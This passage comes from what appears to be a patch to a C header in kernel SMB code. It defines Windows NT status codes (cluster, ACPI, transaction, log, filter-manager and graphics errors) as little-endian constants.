+-#define STATUS_CTX_WINSTATION_ACCESS_DENIED cpu_to_le32(0xC00A002B)
+-#define STATUS_CTX_INVALID_WD cpu_to_le32(0xC00A002E)
+-#define STATUS_CTX_WD_NOT_FOUND cpu_to_le32(0xC00A002F)
+-#define STATUS_CTX_SHADOW_INVALID cpu_to_le32(0xC00A0030)
+-#define STATUS_CTX_SHADOW_DISABLED cpu_to_le32(0xC00A0031)
+-#define STATUS_RDP_PROTOCOL_ERROR cpu_to_le32(0xC00A0032)
+-#define STATUS_CTX_CLIENT_LICENSE_NOT_SET cpu_to_le32(0xC00A0033)
+-#define STATUS_CTX_CLIENT_LICENSE_IN_USE cpu_to_le32(0xC00A0034)
+-#define STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE cpu_to_le32(0xC00A0035)
+-#define STATUS_CTX_SHADOW_NOT_RUNNING cpu_to_le32(0xC00A0036)
+-#define STATUS_CTX_LOGON_DISABLED cpu_to_le32(0xC00A0037)
+-#define STATUS_CTX_SECURITY_LAYER_ERROR cpu_to_le32(0xC00A0038)
+-#define STATUS_TS_INCOMPATIBLE_SESSIONS cpu_to_le32(0xC00A0039)
+-#define STATUS_MUI_FILE_NOT_FOUND cpu_to_le32(0xC00B0001)
+-#define STATUS_MUI_INVALID_FILE cpu_to_le32(0xC00B0002)
+-#define STATUS_MUI_INVALID_RC_CONFIG cpu_to_le32(0xC00B0003)
+-#define STATUS_MUI_INVALID_LOCALE_NAME cpu_to_le32(0xC00B0004)
+-#define STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME cpu_to_le32(0xC00B0005)
+-#define STATUS_MUI_FILE_NOT_LOADED cpu_to_le32(0xC00B0006)
+-#define STATUS_RESOURCE_ENUM_USER_STOP cpu_to_le32(0xC00B0007)
+-#define STATUS_CLUSTER_INVALID_NODE cpu_to_le32(0xC0130001)
+-#define STATUS_CLUSTER_NODE_EXISTS cpu_to_le32(0xC0130002)
+-#define STATUS_CLUSTER_JOIN_IN_PROGRESS cpu_to_le32(0xC0130003)
+-#define STATUS_CLUSTER_NODE_NOT_FOUND cpu_to_le32(0xC0130004)
+-#define STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND cpu_to_le32(0xC0130005)
+-#define STATUS_CLUSTER_NETWORK_EXISTS cpu_to_le32(0xC0130006)
+-#define STATUS_CLUSTER_NETWORK_NOT_FOUND cpu_to_le32(0xC0130007)
+-#define STATUS_CLUSTER_NETINTERFACE_EXISTS cpu_to_le32(0xC0130008)
+-#define STATUS_CLUSTER_NETINTERFACE_NOT_FOUND cpu_to_le32(0xC0130009)
+-#define STATUS_CLUSTER_INVALID_REQUEST cpu_to_le32(0xC013000A)
+-#define STATUS_CLUSTER_INVALID_NETWORK_PROVIDER cpu_to_le32(0xC013000B)
+-#define STATUS_CLUSTER_NODE_DOWN cpu_to_le32(0xC013000C)
+-#define STATUS_CLUSTER_NODE_UNREACHABLE cpu_to_le32(0xC013000D)
+-#define STATUS_CLUSTER_NODE_NOT_MEMBER cpu_to_le32(0xC013000E)
+-#define STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS cpu_to_le32(0xC013000F)
+-#define STATUS_CLUSTER_INVALID_NETWORK cpu_to_le32(0xC0130010)
+-#define STATUS_CLUSTER_NO_NET_ADAPTERS cpu_to_le32(0xC0130011)
+-#define STATUS_CLUSTER_NODE_UP cpu_to_le32(0xC0130012)
+-#define STATUS_CLUSTER_NODE_PAUSED cpu_to_le32(0xC0130013)
+-#define STATUS_CLUSTER_NODE_NOT_PAUSED cpu_to_le32(0xC0130014)
+-#define STATUS_CLUSTER_NO_SECURITY_CONTEXT cpu_to_le32(0xC0130015)
+-#define STATUS_CLUSTER_NETWORK_NOT_INTERNAL cpu_to_le32(0xC0130016)
+-#define STATUS_CLUSTER_POISONED cpu_to_le32(0xC0130017)
+-#define STATUS_ACPI_INVALID_OPCODE cpu_to_le32(0xC0140001)
+-#define STATUS_ACPI_STACK_OVERFLOW cpu_to_le32(0xC0140002)
+-#define STATUS_ACPI_ASSERT_FAILED cpu_to_le32(0xC0140003)
+-#define STATUS_ACPI_INVALID_INDEX cpu_to_le32(0xC0140004)
+-#define STATUS_ACPI_INVALID_ARGUMENT cpu_to_le32(0xC0140005)
+-#define STATUS_ACPI_FATAL cpu_to_le32(0xC0140006)
+-#define STATUS_ACPI_INVALID_SUPERNAME cpu_to_le32(0xC0140007)
+-#define STATUS_ACPI_INVALID_ARGTYPE cpu_to_le32(0xC0140008)
+-#define STATUS_ACPI_INVALID_OBJTYPE cpu_to_le32(0xC0140009)
+-#define STATUS_ACPI_INVALID_TARGETTYPE cpu_to_le32(0xC014000A)
+-#define STATUS_ACPI_INCORRECT_ARGUMENT_COUNT cpu_to_le32(0xC014000B)
+-#define STATUS_ACPI_ADDRESS_NOT_MAPPED cpu_to_le32(0xC014000C)
+-#define STATUS_ACPI_INVALID_EVENTTYPE cpu_to_le32(0xC014000D)
+-#define STATUS_ACPI_HANDLER_COLLISION cpu_to_le32(0xC014000E)
+-#define STATUS_ACPI_INVALID_DATA cpu_to_le32(0xC014000F)
+-#define STATUS_ACPI_INVALID_REGION cpu_to_le32(0xC0140010)
+-#define STATUS_ACPI_INVALID_ACCESS_SIZE cpu_to_le32(0xC0140011)
+-#define STATUS_ACPI_ACQUIRE_GLOBAL_LOCK cpu_to_le32(0xC0140012)
+-#define STATUS_ACPI_ALREADY_INITIALIZED cpu_to_le32(0xC0140013)
+-#define STATUS_ACPI_NOT_INITIALIZED cpu_to_le32(0xC0140014)
+-#define STATUS_ACPI_INVALID_MUTEX_LEVEL cpu_to_le32(0xC0140015)
+-#define STATUS_ACPI_MUTEX_NOT_OWNED cpu_to_le32(0xC0140016)
+-#define STATUS_ACPI_MUTEX_NOT_OWNER cpu_to_le32(0xC0140017)
+-#define STATUS_ACPI_RS_ACCESS cpu_to_le32(0xC0140018)
+-#define STATUS_ACPI_INVALID_TABLE cpu_to_le32(0xC0140019)
+-#define STATUS_ACPI_REG_HANDLER_FAILED cpu_to_le32(0xC0140020)
+-#define STATUS_ACPI_POWER_REQUEST_FAILED cpu_to_le32(0xC0140021)
+-#define STATUS_SXS_SECTION_NOT_FOUND cpu_to_le32(0xC0150001)
+-#define STATUS_SXS_CANT_GEN_ACTCTX cpu_to_le32(0xC0150002)
+-#define STATUS_SXS_INVALID_ACTCTXDATA_FORMAT cpu_to_le32(0xC0150003)
+-#define STATUS_SXS_ASSEMBLY_NOT_FOUND cpu_to_le32(0xC0150004)
+-#define STATUS_SXS_MANIFEST_FORMAT_ERROR cpu_to_le32(0xC0150005)
+-#define STATUS_SXS_MANIFEST_PARSE_ERROR cpu_to_le32(0xC0150006)
+-#define STATUS_SXS_ACTIVATION_CONTEXT_DISABLED cpu_to_le32(0xC0150007)
+-#define STATUS_SXS_KEY_NOT_FOUND cpu_to_le32(0xC0150008)
+-#define STATUS_SXS_VERSION_CONFLICT cpu_to_le32(0xC0150009)
+-#define STATUS_SXS_WRONG_SECTION_TYPE cpu_to_le32(0xC015000A)
+-#define STATUS_SXS_THREAD_QUERIES_DISABLED cpu_to_le32(0xC015000B)
+-#define STATUS_SXS_ASSEMBLY_MISSING cpu_to_le32(0xC015000C)
+-#define STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET cpu_to_le32(0xC015000E)
+-#define STATUS_SXS_EARLY_DEACTIVATION cpu_to_le32(0xC015000F)
+-#define STATUS_SXS_INVALID_DEACTIVATION cpu_to_le32(0xC0150010)
+-#define STATUS_SXS_MULTIPLE_DEACTIVATION cpu_to_le32(0xC0150011)
+-#define STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY cpu_to_le32(0xC0150012)
+-#define STATUS_SXS_PROCESS_TERMINATION_REQUESTED cpu_to_le32(0xC0150013)
+-#define STATUS_SXS_CORRUPT_ACTIVATION_STACK cpu_to_le32(0xC0150014)
+-#define STATUS_SXS_CORRUPTION cpu_to_le32(0xC0150015)
+-#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE cpu_to_le32(0xC0150016)
+-#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME cpu_to_le32(0xC0150017)
+-#define STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE cpu_to_le32(0xC0150018)
+-#define STATUS_SXS_IDENTITY_PARSE_ERROR cpu_to_le32(0xC0150019)
+-#define STATUS_SXS_COMPONENT_STORE_CORRUPT cpu_to_le32(0xC015001A)
+-#define STATUS_SXS_FILE_HASH_MISMATCH cpu_to_le32(0xC015001B)
+-#define STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT cpu_to_le32(0xC015001C)
+-#define STATUS_SXS_IDENTITIES_DIFFERENT cpu_to_le32(0xC015001D)
+-#define STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT cpu_to_le32(0xC015001E)
+-#define STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY cpu_to_le32(0xC015001F)
+-#define STATUS_ADVANCED_INSTALLER_FAILED cpu_to_le32(0xC0150020)
+-#define STATUS_XML_ENCODING_MISMATCH cpu_to_le32(0xC0150021)
+-#define STATUS_SXS_MANIFEST_TOO_BIG cpu_to_le32(0xC0150022)
+-#define STATUS_SXS_SETTING_NOT_REGISTERED cpu_to_le32(0xC0150023)
+-#define STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE cpu_to_le32(0xC0150024)
+-#define STATUS_SMI_PRIMITIVE_INSTALLER_FAILED cpu_to_le32(0xC0150025)
+-#define STATUS_GENERIC_COMMAND_FAILED cpu_to_le32(0xC0150026)
+-#define STATUS_SXS_FILE_HASH_MISSING cpu_to_le32(0xC0150027)
+-#define STATUS_TRANSACTIONAL_CONFLICT cpu_to_le32(0xC0190001)
+-#define STATUS_INVALID_TRANSACTION cpu_to_le32(0xC0190002)
+-#define STATUS_TRANSACTION_NOT_ACTIVE cpu_to_le32(0xC0190003)
+-#define STATUS_TM_INITIALIZATION_FAILED cpu_to_le32(0xC0190004)
+-#define STATUS_RM_NOT_ACTIVE cpu_to_le32(0xC0190005)
+-#define STATUS_RM_METADATA_CORRUPT cpu_to_le32(0xC0190006)
+-#define STATUS_TRANSACTION_NOT_JOINED cpu_to_le32(0xC0190007)
+-#define STATUS_DIRECTORY_NOT_RM cpu_to_le32(0xC0190008)
+-#define STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE cpu_to_le32(0xC019000A)
+-#define STATUS_LOG_RESIZE_INVALID_SIZE cpu_to_le32(0xC019000B)
+-#define STATUS_REMOTE_FILE_VERSION_MISMATCH cpu_to_le32(0xC019000C)
+-#define STATUS_CRM_PROTOCOL_ALREADY_EXISTS cpu_to_le32(0xC019000F)
+-#define STATUS_TRANSACTION_PROPAGATION_FAILED cpu_to_le32(0xC0190010)
+-#define STATUS_CRM_PROTOCOL_NOT_FOUND cpu_to_le32(0xC0190011)
+-#define STATUS_TRANSACTION_SUPERIOR_EXISTS cpu_to_le32(0xC0190012)
+-#define STATUS_TRANSACTION_REQUEST_NOT_VALID cpu_to_le32(0xC0190013)
+-#define STATUS_TRANSACTION_NOT_REQUESTED cpu_to_le32(0xC0190014)
+-#define STATUS_TRANSACTION_ALREADY_ABORTED cpu_to_le32(0xC0190015)
+-#define STATUS_TRANSACTION_ALREADY_COMMITTED cpu_to_le32(0xC0190016)
+-#define STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER cpu_to_le32(0xC0190017)
+-#define STATUS_CURRENT_TRANSACTION_NOT_VALID cpu_to_le32(0xC0190018)
+-#define STATUS_LOG_GROWTH_FAILED cpu_to_le32(0xC0190019)
+-#define STATUS_OBJECT_NO_LONGER_EXISTS cpu_to_le32(0xC0190021)
+-#define STATUS_STREAM_MINIVERSION_NOT_FOUND cpu_to_le32(0xC0190022)
+-#define STATUS_STREAM_MINIVERSION_NOT_VALID cpu_to_le32(0xC0190023)
+-#define STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION cpu_to_le32(0xC0190024)
+-#define STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT cpu_to_le32(0xC0190025)
+-#define STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS cpu_to_le32(0xC0190026)
+-#define STATUS_HANDLE_NO_LONGER_VALID cpu_to_le32(0xC0190028)
+-#define STATUS_LOG_CORRUPTION_DETECTED cpu_to_le32(0xC0190030)
+-#define STATUS_RM_DISCONNECTED cpu_to_le32(0xC0190032)
+-#define STATUS_ENLISTMENT_NOT_SUPERIOR cpu_to_le32(0xC0190033)
+-#define STATUS_FILE_IDENTITY_NOT_PERSISTENT cpu_to_le32(0xC0190036)
+-#define STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY cpu_to_le32(0xC0190037)
+-#define STATUS_CANT_CROSS_RM_BOUNDARY cpu_to_le32(0xC0190038)
+-#define STATUS_TXF_DIR_NOT_EMPTY cpu_to_le32(0xC0190039)
+-#define STATUS_INDOUBT_TRANSACTIONS_EXIST cpu_to_le32(0xC019003A)
+-#define STATUS_TM_VOLATILE cpu_to_le32(0xC019003B)
+-#define STATUS_ROLLBACK_TIMER_EXPIRED cpu_to_le32(0xC019003C)
+-#define STATUS_TXF_ATTRIBUTE_CORRUPT cpu_to_le32(0xC019003D)
+-#define STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC019003E)
+-#define STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED cpu_to_le32(0xC019003F)
+-#define STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE cpu_to_le32(0xC0190040)
+-#define STATUS_TRANSACTION_REQUIRED_PROMOTION cpu_to_le32(0xC0190043)
+-#define STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION cpu_to_le32(0xC0190044)
+-#define STATUS_TRANSACTIONS_NOT_FROZEN cpu_to_le32(0xC0190045)
+-#define STATUS_TRANSACTION_FREEZE_IN_PROGRESS cpu_to_le32(0xC0190046)
+-#define STATUS_NOT_SNAPSHOT_VOLUME cpu_to_le32(0xC0190047)
+-#define STATUS_NO_SAVEPOINT_WITH_OPEN_FILES cpu_to_le32(0xC0190048)
+-#define STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190049)
+-#define STATUS_TM_IDENTITY_MISMATCH cpu_to_le32(0xC019004A)
+-#define STATUS_FLOATED_SECTION cpu_to_le32(0xC019004B)
+-#define STATUS_CANNOT_ACCEPT_TRANSACTED_WORK cpu_to_le32(0xC019004C)
+-#define STATUS_CANNOT_ABORT_TRANSACTIONS cpu_to_le32(0xC019004D)
+-#define STATUS_TRANSACTION_NOT_FOUND cpu_to_le32(0xC019004E)
+-#define STATUS_RESOURCEMANAGER_NOT_FOUND cpu_to_le32(0xC019004F)
+-#define STATUS_ENLISTMENT_NOT_FOUND cpu_to_le32(0xC0190050)
+-#define STATUS_TRANSACTIONMANAGER_NOT_FOUND cpu_to_le32(0xC0190051)
+-#define STATUS_TRANSACTIONMANAGER_NOT_ONLINE cpu_to_le32(0xC0190052)
+-#define STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION cpu_to_le32(0xC0190053)
+-#define STATUS_TRANSACTION_NOT_ROOT cpu_to_le32(0xC0190054)
+-#define STATUS_TRANSACTION_OBJECT_EXPIRED cpu_to_le32(0xC0190055)
+-#define STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190056)
+-#define STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED cpu_to_le32(0xC0190057)
+-#define STATUS_TRANSACTION_RECORD_TOO_LONG cpu_to_le32(0xC0190058)
+-#define STATUS_NO_LINK_TRACKING_IN_TRANSACTION cpu_to_le32(0xC0190059)
+-#define STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION cpu_to_le32(0xC019005A)
+-#define STATUS_TRANSACTION_INTEGRITY_VIOLATED cpu_to_le32(0xC019005B)
+-#define STATUS_LOG_SECTOR_INVALID cpu_to_le32(0xC01A0001)
+-#define STATUS_LOG_SECTOR_PARITY_INVALID cpu_to_le32(0xC01A0002)
+-#define STATUS_LOG_SECTOR_REMAPPED cpu_to_le32(0xC01A0003)
+-#define STATUS_LOG_BLOCK_INCOMPLETE cpu_to_le32(0xC01A0004)
+-#define STATUS_LOG_INVALID_RANGE cpu_to_le32(0xC01A0005)
+-#define STATUS_LOG_BLOCKS_EXHAUSTED cpu_to_le32(0xC01A0006)
+-#define STATUS_LOG_READ_CONTEXT_INVALID cpu_to_le32(0xC01A0007)
+-#define STATUS_LOG_RESTART_INVALID cpu_to_le32(0xC01A0008)
+-#define STATUS_LOG_BLOCK_VERSION cpu_to_le32(0xC01A0009)
+-#define STATUS_LOG_BLOCK_INVALID cpu_to_le32(0xC01A000A)
+-#define STATUS_LOG_READ_MODE_INVALID cpu_to_le32(0xC01A000B)
+-#define STATUS_LOG_METADATA_CORRUPT cpu_to_le32(0xC01A000D)
+-#define STATUS_LOG_METADATA_INVALID cpu_to_le32(0xC01A000E)
+-#define STATUS_LOG_METADATA_INCONSISTENT cpu_to_le32(0xC01A000F)
+-#define STATUS_LOG_RESERVATION_INVALID cpu_to_le32(0xC01A0010)
+-#define STATUS_LOG_CANT_DELETE cpu_to_le32(0xC01A0011)
+-#define STATUS_LOG_CONTAINER_LIMIT_EXCEEDED cpu_to_le32(0xC01A0012)
+-#define STATUS_LOG_START_OF_LOG cpu_to_le32(0xC01A0013)
+-#define STATUS_LOG_POLICY_ALREADY_INSTALLED cpu_to_le32(0xC01A0014)
+-#define STATUS_LOG_POLICY_NOT_INSTALLED cpu_to_le32(0xC01A0015)
+-#define STATUS_LOG_POLICY_INVALID cpu_to_le32(0xC01A0016)
+-#define STATUS_LOG_POLICY_CONFLICT cpu_to_le32(0xC01A0017)
+-#define STATUS_LOG_PINNED_ARCHIVE_TAIL cpu_to_le32(0xC01A0018)
+-#define STATUS_LOG_RECORD_NONEXISTENT cpu_to_le32(0xC01A0019)
+-#define STATUS_LOG_RECORDS_RESERVED_INVALID cpu_to_le32(0xC01A001A)
+-#define STATUS_LOG_SPACE_RESERVED_INVALID cpu_to_le32(0xC01A001B)
+-#define STATUS_LOG_TAIL_INVALID cpu_to_le32(0xC01A001C)
+-#define STATUS_LOG_FULL cpu_to_le32(0xC01A001D)
+-#define STATUS_LOG_MULTIPLEXED cpu_to_le32(0xC01A001E)
+-#define STATUS_LOG_DEDICATED cpu_to_le32(0xC01A001F)
+-#define STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS cpu_to_le32(0xC01A0020)
+-#define STATUS_LOG_ARCHIVE_IN_PROGRESS cpu_to_le32(0xC01A0021)
+-#define STATUS_LOG_EPHEMERAL cpu_to_le32(0xC01A0022)
+-#define STATUS_LOG_NOT_ENOUGH_CONTAINERS cpu_to_le32(0xC01A0023)
+-#define STATUS_LOG_CLIENT_ALREADY_REGISTERED cpu_to_le32(0xC01A0024)
+-#define STATUS_LOG_CLIENT_NOT_REGISTERED cpu_to_le32(0xC01A0025)
+-#define STATUS_LOG_FULL_HANDLER_IN_PROGRESS cpu_to_le32(0xC01A0026)
+-#define STATUS_LOG_CONTAINER_READ_FAILED cpu_to_le32(0xC01A0027)
+-#define STATUS_LOG_CONTAINER_WRITE_FAILED cpu_to_le32(0xC01A0028)
+-#define STATUS_LOG_CONTAINER_OPEN_FAILED cpu_to_le32(0xC01A0029)
+-#define STATUS_LOG_CONTAINER_STATE_INVALID cpu_to_le32(0xC01A002A)
+-#define STATUS_LOG_STATE_INVALID cpu_to_le32(0xC01A002B)
+-#define STATUS_LOG_PINNED cpu_to_le32(0xC01A002C)
+-#define STATUS_LOG_METADATA_FLUSH_FAILED cpu_to_le32(0xC01A002D)
+-#define STATUS_LOG_INCONSISTENT_SECURITY cpu_to_le32(0xC01A002E)
+-#define STATUS_LOG_APPENDED_FLUSH_FAILED cpu_to_le32(0xC01A002F)
+-#define STATUS_LOG_PINNED_RESERVATION cpu_to_le32(0xC01A0030)
+-#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC01B00EA)
+-#define STATUS_FLT_NO_HANDLER_DEFINED cpu_to_le32(0xC01C0001)
+-#define STATUS_FLT_CONTEXT_ALREADY_DEFINED cpu_to_le32(0xC01C0002)
+-#define STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST cpu_to_le32(0xC01C0003)
+-#define STATUS_FLT_DISALLOW_FAST_IO cpu_to_le32(0xC01C0004)
+-#define STATUS_FLT_INVALID_NAME_REQUEST cpu_to_le32(0xC01C0005)
+-#define STATUS_FLT_NOT_SAFE_TO_POST_OPERATION cpu_to_le32(0xC01C0006)
+-#define STATUS_FLT_NOT_INITIALIZED cpu_to_le32(0xC01C0007)
+-#define STATUS_FLT_FILTER_NOT_READY cpu_to_le32(0xC01C0008)
+-#define STATUS_FLT_POST_OPERATION_CLEANUP cpu_to_le32(0xC01C0009)
+-#define STATUS_FLT_INTERNAL_ERROR cpu_to_le32(0xC01C000A)
+-#define STATUS_FLT_DELETING_OBJECT cpu_to_le32(0xC01C000B)
+-#define STATUS_FLT_MUST_BE_NONPAGED_POOL cpu_to_le32(0xC01C000C)
+-#define STATUS_FLT_DUPLICATE_ENTRY cpu_to_le32(0xC01C000D)
+-#define STATUS_FLT_CBDQ_DISABLED cpu_to_le32(0xC01C000E)
+-#define STATUS_FLT_DO_NOT_ATTACH cpu_to_le32(0xC01C000F)
+-#define STATUS_FLT_DO_NOT_DETACH cpu_to_le32(0xC01C0010)
+-#define STATUS_FLT_INSTANCE_ALTITUDE_COLLISION cpu_to_le32(0xC01C0011)
+-#define STATUS_FLT_INSTANCE_NAME_COLLISION cpu_to_le32(0xC01C0012)
+-#define STATUS_FLT_FILTER_NOT_FOUND cpu_to_le32(0xC01C0013)
+-#define STATUS_FLT_VOLUME_NOT_FOUND cpu_to_le32(0xC01C0014)
+-#define STATUS_FLT_INSTANCE_NOT_FOUND cpu_to_le32(0xC01C0015)
+-#define STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND cpu_to_le32(0xC01C0016)
+-#define STATUS_FLT_INVALID_CONTEXT_REGISTRATION cpu_to_le32(0xC01C0017)
+-#define STATUS_FLT_NAME_CACHE_MISS cpu_to_le32(0xC01C0018)
+-#define STATUS_FLT_NO_DEVICE_OBJECT cpu_to_le32(0xC01C0019)
+-#define STATUS_FLT_VOLUME_ALREADY_MOUNTED cpu_to_le32(0xC01C001A)
+-#define STATUS_FLT_ALREADY_ENLISTED cpu_to_le32(0xC01C001B)
+-#define STATUS_FLT_CONTEXT_ALREADY_LINKED cpu_to_le32(0xC01C001C)
+-#define STATUS_FLT_NO_WAITER_FOR_REPLY cpu_to_le32(0xC01C0020)
+-#define STATUS_MONITOR_NO_DESCRIPTOR cpu_to_le32(0xC01D0001)
+-#define STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT cpu_to_le32(0xC01D0002)
+-#define STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM cpu_to_le32(0xC01D0003)
+-#define STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK cpu_to_le32(0xC01D0004)
+-#define STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED cpu_to_le32(0xC01D0005)
+-#define STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK cpu_to_le32(0xC01D0006)
+-#define STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK cpu_to_le32(0xC01D0007)
+-#define STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA cpu_to_le32(0xC01D0008)
+-#define STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK cpu_to_le32(0xC01D0009)
+-#define STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER cpu_to_le32(0xC01E0000)
+-#define STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER cpu_to_le32(0xC01E0001)
+-#define STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER cpu_to_le32(0xC01E0002)
+-#define STATUS_GRAPHICS_ADAPTER_WAS_RESET cpu_to_le32(0xC01E0003)
+-#define STATUS_GRAPHICS_INVALID_DRIVER_MODEL cpu_to_le32(0xC01E0004)
+-#define STATUS_GRAPHICS_PRESENT_MODE_CHANGED cpu_to_le32(0xC01E0005)
+-#define STATUS_GRAPHICS_PRESENT_OCCLUDED cpu_to_le32(0xC01E0006)
+-#define STATUS_GRAPHICS_PRESENT_DENIED cpu_to_le32(0xC01E0007)
+-#define STATUS_GRAPHICS_CANNOTCOLORCONVERT cpu_to_le32(0xC01E0008)
+-#define STATUS_GRAPHICS_NO_VIDEO_MEMORY cpu_to_le32(0xC01E0100)
+-#define STATUS_GRAPHICS_CANT_LOCK_MEMORY cpu_to_le32(0xC01E0101)
+-#define STATUS_GRAPHICS_ALLOCATION_BUSY cpu_to_le32(0xC01E0102)
+-#define STATUS_GRAPHICS_TOO_MANY_REFERENCES cpu_to_le32(0xC01E0103)
+-#define STATUS_GRAPHICS_TRY_AGAIN_LATER cpu_to_le32(0xC01E0104)
+-#define STATUS_GRAPHICS_TRY_AGAIN_NOW cpu_to_le32(0xC01E0105)
+-#define STATUS_GRAPHICS_ALLOCATION_INVALID cpu_to_le32(0xC01E0106)
+-#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE cpu_to_le32(0xC01E0107)
+-#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED cpu_to_le32(0xC01E0108)
+-#define STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION cpu_to_le32(0xC01E0109)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE cpu_to_le32(0xC01E0110)
+-#define STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION cpu_to_le32(0xC01E0111)
+-#define STATUS_GRAPHICS_ALLOCATION_CLOSED cpu_to_le32(0xC01E0112)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE cpu_to_le32(0xC01E0113)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE cpu_to_le32(0xC01E0114)
+-#define STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE cpu_to_le32(0xC01E0115)
+-#define STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST cpu_to_le32(0xC01E0116)
+-#define STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE cpu_to_le32(0xC01E0200)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0300)
+-#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED cpu_to_le32(0xC01E0301)
+-#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED cpu_to_le32(0xC01E0302)
+-#define STATUS_GRAPHICS_INVALID_VIDPN cpu_to_le32(0xC01E0303)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE cpu_to_le32(0xC01E0304)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET cpu_to_le32(0xC01E0305)
+-#define STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED cpu_to_le32(0xC01E0306)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET cpu_to_le32(0xC01E0308)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET cpu_to_le32(0xC01E0309)
+-#define STATUS_GRAPHICS_INVALID_FREQUENCY cpu_to_le32(0xC01E030A)
+-#define STATUS_GRAPHICS_INVALID_ACTIVE_REGION cpu_to_le32(0xC01E030B)
+-#define STATUS_GRAPHICS_INVALID_TOTAL_REGION cpu_to_le32(0xC01E030C)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE cpu_to_le32(0xC01E0310)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE cpu_to_le32(0xC01E0311)
+-#define STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET cpu_to_le32(0xC01E0312)
+-#define STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY cpu_to_le32(0xC01E0313)
+-#define STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET cpu_to_le32(0xC01E0314)
+-#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET cpu_to_le32(0xC01E0315)
+-#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET cpu_to_le32(0xC01E0316)
+-#define STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET cpu_to_le32(0xC01E0317)
+-#define STATUS_GRAPHICS_TARGET_ALREADY_IN_SET cpu_to_le32(0xC01E0318)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH cpu_to_le32(0xC01E0319)
+-#define STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY cpu_to_le32(0xC01E031A)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET cpu_to_le32(0xC01E031B)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE cpu_to_le32(0xC01E031C)
+-#define STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET cpu_to_le32(0xC01E031D)
+-#define STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET cpu_to_le32(0xC01E031F)
+-#define STATUS_GRAPHICS_STALE_MODESET cpu_to_le32(0xC01E0320)
